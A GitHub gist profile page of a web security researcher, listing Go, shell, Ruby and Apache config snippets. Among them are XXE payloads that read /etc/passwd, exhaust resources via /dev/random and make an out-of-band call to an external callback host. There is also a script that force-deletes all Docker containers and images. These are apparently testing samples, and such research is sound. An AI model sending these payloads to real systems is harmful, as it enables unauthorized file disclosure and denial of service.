Omar Kurt omarkurt

RO's father, web application security, @HappyHackingSpace

236 followers · 40 following

View GitHub Profile

Recently created

Least recently created

Recently updated

Least recently updated

omarkurt / mux.go

Created June 17, 2018 09:18

	package main

	import (
	"net/http"
	"log"
	"github.com/gorilla/mux"
	)

	func YourHandler(w http.ResponseWriter, r *http.Request) {
	w.Write([]byte("Gorilla!\n"))

omarkurt / beego.go

Last active June 17, 2018 09:17

beego.go

	package main

	import "github.com/astaxie/beego"

	func main(){
	beego.Run()
	}

omarkurt / gist:5511026bf9a8a1000582d5c7a2084b0e

Created June 12, 2018 23:06

gas.sh

	#!/bin/bash

	# go get -u github.com/GoASTScanner/gas

	gas -fmt=json -out=html.json -include=G101,G102,G103,G104,G105,G106,G201,G202,G203,G204,G301,G302,G303,G304,G401,G402,G403,G404,G501,G502,G503,G504 ./...

omarkurt / docker.sh

Last active May 26, 2018 14:59 — forked from random-robbie/docker.sh

docker kill and remove

	#!/bin/bash
	# kill current docker
	docker kill $(docker ps -q)
	# Delete all containers
	docker rm $(docker ps -a -q)
	# Delete all images -f
	docker rmi -f $(docker images -q)
	# For exited
	docker rm -v $(docker ps -aq -f status=exited)

omarkurt / kral.go

Created November 4, 2017 09:37

acl test code

	package main

	import (
	"fmt"
	"net/http"

	"github.com/gin-gonic/gin"
	"github.com/s4l1h/acl"
	)

omarkurt / altdns.rb

Created May 18, 2017 21:41

	require 'pipeline/tasks/base_task'
	require 'pipeline/util'
	require 'nokogiri'

	class Pipeline::AltDNSScanner < Pipeline::BaseTask
	Pipeline::Tasks.add self
	include Pipeline::Util
	def initialize(trigger, tracker)
	super(trigger, tracker)
	@name = 'AltDNSScanner'

omarkurt / z

Created October 21, 2016 12:18

<?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "http://jligddrrgibmgk0khyeweb88up6cjxqebzvaez98zxm.r87.me/r/">]><ns>&lfi;</ns>

omarkurt / xxe.xml

Last active June 24, 2016 11:31

	<?xml version="1.0" encoding="UTF-8"?>
	<!DOCTYPE description [ <!ELEMENT description ANY >
	<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
	<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
	<title>Test</title>
	<link>za</link>
	<description>A blog about things</description>
	<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
	<item>

omarkurt / xxe

Created August 15, 2015 11:39

	<?xml version="1.0" encoding="ISO-8859-1"?>
	<!DOCTYPE foo [
	<!ELEMENT foo ANY >
	<!ENTITY xxe SYSTEM "file:///dev/random" >]><foo>&xxe;</foo>

omarkurt / Apache header to Security

Created August 11, 2015 08:25

	#Security
	Header set X-Frame-Options: sameorigin
	Header set X-XSS-Protection: "1; mode=block"
	Header set X-WebKit-CSP: "default-src 'self'"
	Header set X-Content-Type-Options: nosniff
	Header set X-Permitted-Cross-Domain-Policies: "master-only"
	Header set Strict-Transport-Security "max-age=31536000; includeSubDomains"
	Header unset ETag

Newer Older